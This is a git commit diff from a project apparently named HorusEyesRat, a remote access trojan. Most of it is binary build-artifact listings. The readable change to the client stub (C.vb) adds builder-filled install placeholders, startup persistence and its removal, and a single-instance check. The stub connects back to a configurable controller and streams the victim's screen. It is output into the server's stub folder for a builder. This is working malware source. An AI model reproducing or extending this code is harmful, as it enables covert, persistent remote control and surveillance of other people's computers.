a/ClassLibrary1/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..951925a Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/33249C731AE27AC842E2A1AD1D048593C57C8BF8.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/33249C731AE27AC842E2A1AD1D048593C57C8BF8.costura.options.dll.compressed new file mode 100644 index 0000000..fee461a Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/33249C731AE27AC842E2A1AD1D048593C57C8BF8.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/3728B2E33C187AA85D9DE4C306F35D71AA102F57.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/3728B2E33C187AA85D9DE4C306F35D71AA102F57.costura.options.pdb.compressed new file mode 100644 index 0000000..286270e Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/3728B2E33C187AA85D9DE4C306F35D71AA102F57.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/3910553A781417FF4F765DE50EF28442F8275B9E.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/3910553A781417FF4F765DE50EF28442F8275B9E.costura.options.dll.compressed new file mode 100644 index 0000000..025632a Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/3910553A781417FF4F765DE50EF28442F8275B9E.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed new file mode 100644 index 0000000..bda82f6 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..9790ff2 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed new file mode 100644 index 0000000..7f5d0f2 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/5245E9912CAA9FAD8EE98687874D35C855926E2C.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/5245E9912CAA9FAD8EE98687874D35C855926E2C.costura.options.dll.compressed new file mode 100644 index 0000000..f71113a Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/5245E9912CAA9FAD8EE98687874D35C855926E2C.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/5387F1C3CE5890A97C49BB2AF9178E19CD451825.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/5387F1C3CE5890A97C49BB2AF9178E19CD451825.costura.options.dll.compressed new file mode 100644 index 0000000..d892f46 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/5387F1C3CE5890A97C49BB2AF9178E19CD451825.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/58B060B3EA2C16FE7F5264B09C4CD3ADF0902E70.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/58B060B3EA2C16FE7F5264B09C4CD3ADF0902E70.costura.options.pdb.compressed new file mode 100644 index 0000000..e7e9c7f Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/58B060B3EA2C16FE7F5264B09C4CD3ADF0902E70.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/ClassLibrary1/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/5A3B4A7DB214F264F4706D68C7DE4E2051AFF9B4.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/5A3B4A7DB214F264F4706D68C7DE4E2051AFF9B4.costura.options.dll.compressed new file mode 100644 index 0000000..25eb9eb Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/5A3B4A7DB214F264F4706D68C7DE4E2051AFF9B4.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/648B7509A0B6C196C578B980DFAA94058265737B.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/648B7509A0B6C196C578B980DFAA94058265737B.costura.options.dll.compressed new file mode 100644 index 0000000..36aabb7 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/648B7509A0B6C196C578B980DFAA94058265737B.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/6538CF4F9198D621796629CA6D091891943A30A9.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/6538CF4F9198D621796629CA6D091891943A30A9.costura.options.dll.compressed new file mode 100644 index 0000000..488b3bd Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/6538CF4F9198D621796629CA6D091891943A30A9.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/67880C1FF0227713C8B6E328951C3C1EECCAF0D8.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/67880C1FF0227713C8B6E328951C3C1EECCAF0D8.costura.options.pdb.compressed new file mode 100644 index 0000000..b67885e Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/67880C1FF0227713C8B6E328951C3C1EECCAF0D8.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/6E3E17A7AAFE8E4853E170D0AE07C7C6305E6E9C.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/6E3E17A7AAFE8E4853E170D0AE07C7C6305E6E9C.costura.options.pdb.compressed new file mode 100644 index 0000000..1fb37ac Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/6E3E17A7AAFE8E4853E170D0AE07C7C6305E6E9C.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/6F4865E53780D7005664A057598A2DFA4C4F916B.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/6F4865E53780D7005664A057598A2DFA4C4F916B.costura.options.pdb.compressed new file mode 100644 index 0000000..6a80e1d Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/6F4865E53780D7005664A057598A2DFA4C4F916B.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed new file mode 100644 index 0000000..b30cb5b Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/7A811D77E47908A9D52B108FC3C2B59118C23190.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/7A811D77E47908A9D52B108FC3C2B59118C23190.costura.options.pdb.compressed new file mode 100644 index 0000000..3359e25 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/7A811D77E47908A9D52B108FC3C2B59118C23190.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/7AF2B0DDD3434CAE2BB482B31CA7CFC9041C8DEF.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/7AF2B0DDD3434CAE2BB482B31CA7CFC9041C8DEF.costura.options.pdb.compressed new file mode 100644 index 0000000..30f0f4d Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/7AF2B0DDD3434CAE2BB482B31CA7CFC9041C8DEF.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/84C1EADDF6E46FFFAE195AD040C40603C18EBF8D.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/84C1EADDF6E46FFFAE195AD040C40603C18EBF8D.costura.options.dll.compressed new file mode 100644 index 0000000..2adb729 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/84C1EADDF6E46FFFAE195AD040C40603C18EBF8D.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/87796B8C3F3A19D6B1213F0454B14B8404DCD936.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/87796B8C3F3A19D6B1213F0454B14B8404DCD936.costura.options.pdb.compressed new file mode 100644 index 0000000..809e967 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/87796B8C3F3A19D6B1213F0454B14B8404DCD936.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..5f08bb9 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/90BCD88E8C49132EDF34A212A8EE86D76BBBAAC7.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/90BCD88E8C49132EDF34A212A8EE86D76BBBAAC7.costura.options.dll.compressed new file mode 100644 index 0000000..e6a2588 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/90BCD88E8C49132EDF34A212A8EE86D76BBBAAC7.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..baf979e Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed new file mode 100644 index 0000000..2c67faa Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed new file mode 100644 index 0000000..56dfbdd Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed new file mode 100644 index 0000000..a4645e4 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/A3C854D55F99E7F58315D98B75A6646375F1842A.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/A3C854D55F99E7F58315D98B75A6646375F1842A.costura.options.pdb.compressed new file mode 100644 index 0000000..02f4ea8 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/A3C854D55F99E7F58315D98B75A6646375F1842A.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/B20B1E84E6167CE62E8037BE50A01F9A43F7F796.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/B20B1E84E6167CE62E8037BE50A01F9A43F7F796.costura.options.pdb.compressed new file mode 100644 index 0000000..ff6a0c6 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/B20B1E84E6167CE62E8037BE50A01F9A43F7F796.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/B88FF490404A24F4AAA5861706BDEC5463C565E5.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/B88FF490404A24F4AAA5861706BDEC5463C565E5.costura.options.pdb.compressed new file mode 100644 index 0000000..f2b600d Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/B88FF490404A24F4AAA5861706BDEC5463C565E5.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/BAB1C3D13C4FC3113B202640220AF2D33A430013.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/BAB1C3D13C4FC3113B202640220AF2D33A430013.costura.options.pdb.compressed new file mode 100644 index 0000000..08ff0af Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/BAB1C3D13C4FC3113B202640220AF2D33A430013.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed new file mode 100644 index 0000000..643f842 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/BC031A9D3025BC428C1A13185C2272F8D98F4219.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/BC031A9D3025BC428C1A13185C2272F8D98F4219.costura.options.pdb.compressed new file mode 100644 index 0000000..ac007fd Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/BC031A9D3025BC428C1A13185C2272F8D98F4219.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/C18402E3DED3B4CA4FD07E9F6B787C2160EACD45.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/C18402E3DED3B4CA4FD07E9F6B787C2160EACD45.costura.options.dll.compressed new file mode 100644 index 0000000..b0c7c21 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/C18402E3DED3B4CA4FD07E9F6B787C2160EACD45.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/C52D1AE6668216973592CE5314DF1C025AD03E2F.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/C52D1AE6668216973592CE5314DF1C025AD03E2F.costura.options.dll.compressed new file mode 100644 index 0000000..249bcce Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/C52D1AE6668216973592CE5314DF1C025AD03E2F.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/CCDBBD06ACB8597BB0105A34A75FC321BF98713D.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/CCDBBD06ACB8597BB0105A34A75FC321BF98713D.costura.options.dll.compressed new file mode 100644 index 0000000..035385a Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/CCDBBD06ACB8597BB0105A34A75FC321BF98713D.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..02c151f Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/CDA081EB3EBA535146E24D868DB5C9A32AB2BD09.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/CDA081EB3EBA535146E24D868DB5C9A32AB2BD09.costura.options.pdb.compressed new file mode 100644 index 0000000..36f1b62 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/CDA081EB3EBA535146E24D868DB5C9A32AB2BD09.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/D23FAB8D0B9924A56CFD26F70B5B1DD2584CDDC5.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/D23FAB8D0B9924A56CFD26F70B5B1DD2584CDDC5.costura.options.pdb.compressed new file mode 100644 index 0000000..dc9f4dc Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/D23FAB8D0B9924A56CFD26F70B5B1DD2584CDDC5.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/D2A12EA11056E4663BF2A0B8A2E465D0D6761E18.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/D2A12EA11056E4663BF2A0B8A2E465D0D6761E18.costura.options.pdb.compressed new file mode 100644 index 0000000..7b631d8 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/D2A12EA11056E4663BF2A0B8A2E465D0D6761E18.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/D99B6F4AC6A0E271A44CB1D20C65ACA5C6657B66.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/D99B6F4AC6A0E271A44CB1D20C65ACA5C6657B66.costura.options.dll.compressed new file mode 100644 index 0000000..a3cc6d9 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/D99B6F4AC6A0E271A44CB1D20C65ACA5C6657B66.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/D99F71A43762B4671F7F108FC9A3E7E3A9ECC418.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/D99F71A43762B4671F7F108FC9A3E7E3A9ECC418.costura.options.dll.compressed new file mode 100644 index 0000000..a225127 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/D99F71A43762B4671F7F108FC9A3E7E3A9ECC418.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/DC2AD847582077B997173BBAEA5F212C67B26BC7.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/DC2AD847582077B997173BBAEA5F212C67B26BC7.costura.options.pdb.compressed new file mode 100644 index 0000000..cc5c11e Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/DC2AD847582077B997173BBAEA5F212C67B26BC7.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/DC3FBA4EE0E61DA1C17821CBD7A297537FB9CAB6.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/DC3FBA4EE0E61DA1C17821CBD7A297537FB9CAB6.costura.options.dll.compressed new file mode 100644 index 0000000..83928b8 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/DC3FBA4EE0E61DA1C17821CBD7A297537FB9CAB6.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/DCBC0D6860F5FBB83053697F7A65AA4282F7F78D.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/DCBC0D6860F5FBB83053697F7A65AA4282F7F78D.costura.options.dll.compressed new file mode 100644 index 0000000..0af61db Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/DCBC0D6860F5FBB83053697F7A65AA4282F7F78D.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed new file mode 100644 index 0000000..1223a33 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed b/ClassLibrary1/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed new file mode 100644 index 0000000..c389ee1 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/F6D14F8A8520B791A2F7F6439AC57AD2F3AEA30B.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/F6D14F8A8520B791A2F7F6439AC57AD2F3AEA30B.costura.options.dll.compressed new file mode 100644 index 0000000..42f6ee9 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/F6D14F8A8520B791A2F7F6439AC57AD2F3AEA30B.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..e91ead0 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ClassLibrary1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..adeaf3b Binary files /dev/null and b/ClassLibrary1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/ClassLibrary1/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/ClassLibrary1/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..ae90431 Binary files /dev/null and b/ClassLibrary1/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/ClassLibrary1/packages.config b/ClassLibrary1/packages.config new file mode 100644 index 0000000..4a26327 --- /dev/null +++ b/ClassLibrary1/packages.config @@ -0,0 +1,5 @@ + + + + + \ No newline at end of file diff --git a/Client/C.vb b/Client/C.vb index 0560a42..f723101 100644 --- a/Client/C.vb +++ b/Client/C.vb @@ -15,12 +15,6 @@ Imports System.Windows.Forms Imports System.Drawing.Drawing2D Public Class C - - - - - - Public Shared Function CheckDNS() Dim l As IPAddress() = Dns.GetHostAddresses(H) @@ -35,6 +29,11 @@ Public Class C Public Shared H As String = "127.0.0.1" Public Shared P As String = "5900" + Public Shared Install_D As String = "%I1%" + Public Shared Install_T As String = "%TIME%" + Public Shared Install_N As String = "%NAME%" + + Public Shared Sub Check() Dim b As Byte() = System.Text.Encoding.UTF8.GetBytes("") @@ -71,12 +70,24 @@ Public Class C Public Shared Sub Main() + If Install_D = "True" Then + + Dim O As New Options.Options(Install_N) + + Options.Options.StartUp(Install_T) + + End If + + Options.Options.OneInstance() + SetCurrentDirectoryA(IO.Path.GetTempPath) ''To write file later SetPriorityClass(Process.GetCurrentProcess.Handle, dwPriorityClass.ABOVE_NORMAL_PRIORITY_CLASS Or dwPriorityClass.PROCESS_MODE_BACKGROUND_BEGIN) SetProcessPriorityBoost(Process.GetCurrentProcess.Handle, False) SetThreadExecutionState(EXECUTION_STATE.ES_CONTINUOUS Or EXECUTION_STATE.ES_DISPLAY_REQUIRED Or EXECUTION_STATE.ES_SYSTEM_REQUIRED Or EXECUTION_STATE.ES_AWAYMODE_REQUIRED) + Try + T.Connect(IPAddress.Parse(CheckDNS()), Integer.Parse(P)) If T.Connected = True Then @@ -161,10 +172,16 @@ Public Class C Launch(T, packet.Plugin, packet.Function_Params, True) - Case PacketType.MSG + Case PacketType.CLOSE NtTerminateProcess(Process.GetCurrentProcess.Handle, 0) + Case PacketType.U_CLOSE + + Dim O As New Options.Options(Install_N) + + Options.Options.U_StartUp() + Case PacketType.RD @@ -324,7 +341,7 @@ Public Class C .Type_Packet = PacketType.RD } - Dim Send As New Packet_Send With { + Dim Send As New Packet_Send With { .Packet = packet } @@ -333,12 +350,12 @@ Public Class C End SyncLock graphics.Dispose() - g2.Dispose() - img.Dispose() - Resize.Dispose() - MS.Dispose() - encoderParameter.Dispose() - encoderParameters.Dispose() + g2.Dispose() + img.Dispose() + Resize.Dispose() + MS.Dispose() + encoderParameter.Dispose() + encoderParameters.Dispose() Catch ex As Exception End Try diff --git a/Client/Client.vbproj b/Client/Client.vbproj index f5c47ac..1321a3b 100644 --- a/Client/Client.vbproj +++ b/Client/Client.vbproj @@ -3,6 +3,9 @@ + + .allowedextension + Debug AnyCPU {4E3FBBB7-E7FC-4B7C-BF87-4209791FB953} @@ -30,12 +33,15 @@ 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 + + .allowedextension + AnyCPU pdbonly false true true - bin\Release\ + ..\Server\bin\Release\Stubs\ 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -53,6 +59,9 @@ On + + .allowedextension + true true true @@ -63,8 +72,12 @@ true + + .allowedextension + + Stub_64 true - bin\x64\Release\ + ..\Server\bin\Release\Stubs\ true 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 pdbonly @@ -76,6 +89,12 @@ + + ..\Options\bin\Release\Options.dll + + + ..\PacketLib\bin\Release\PacketLib.dll + @@ -93,9 +112,6 @@ ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll - - ..\PacketLib\bin\Debug\PacketLib.dll - diff --git a/Client/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Client/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 7fdf659..99b359e 100644 Binary files a/Client/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/Client/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Client/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/Client/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/Client/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/Client/obj/Release/Client.vbproj.CoreCompileInputs.cache b/Client/obj/Release/Client.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..7ef5d4a --- /dev/null +++ b/Client/obj/Release/Client.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +e5fa6c26d996596b809ce4637d93aa90d53048d6 diff --git a/Client/obj/Release/Client.vbproj.FileListAbsolute.txt b/Client/obj/Release/Client.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..0b3ae8b --- /dev/null +++ b/Client/obj/Release/Client.vbproj.FileListAbsolute.txt @@ -0,0 +1,12 @@ +Z:\HorusEyesRat-master\Client\bin\Release\Stub.exe.config +Z:\HorusEyesRat-master\Client\bin\Release\Stub.exe +Z:\HorusEyesRat-master\Client\bin\Release\Stub.pdb +Z:\HorusEyesRat-master\Client\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Client\obj\Release\Client.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\Client\obj\Release\Client.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\Server\bin\Release\Stubs\Stub.exe.config +Z:\HorusEyesRat-master\Server\bin\Release\Stubs\Stub.exe +Z:\HorusEyesRat-master\Server\bin\Release\Stubs\Stub.pdb +Z:\HorusEyesRat-master\Client\obj\Release\Client.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\Client\obj\Release\Stub.exe +Z:\HorusEyesRat-master\Client\obj\Release\Stub.pdb diff --git a/Client/obj/Release/Client.vbproj.Fody.CopyLocal.cache b/Client/obj/Release/Client.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..e69de29 diff --git a/Client/obj/Release/Client.vbprojAssemblyReference.cache b/Client/obj/Release/Client.vbprojAssemblyReference.cache new file mode 100644 index 0000000..f8f5eca Binary files /dev/null and b/Client/obj/Release/Client.vbprojAssemblyReference.cache differ diff --git a/Client/obj/Release/Costura/006CE6175FD7479380D5725A404143BC2059E7D7.costura.options.pdb.compressed b/Client/obj/Release/Costura/006CE6175FD7479380D5725A404143BC2059E7D7.costura.options.pdb.compressed new file mode 100644 index 0000000..23f1e88 Binary files /dev/null and b/Client/obj/Release/Costura/006CE6175FD7479380D5725A404143BC2059E7D7.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/03D0E19D2430B7FE36ABDBB18F5A2FE8E74581EF.costura.options.pdb.compressed b/Client/obj/Release/Costura/03D0E19D2430B7FE36ABDBB18F5A2FE8E74581EF.costura.options.pdb.compressed new file mode 100644 index 0000000..719e725 Binary files /dev/null and b/Client/obj/Release/Costura/03D0E19D2430B7FE36ABDBB18F5A2FE8E74581EF.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/04EF452C48827A1D094B1864103454518553D69D.costura.options.pdb.compressed 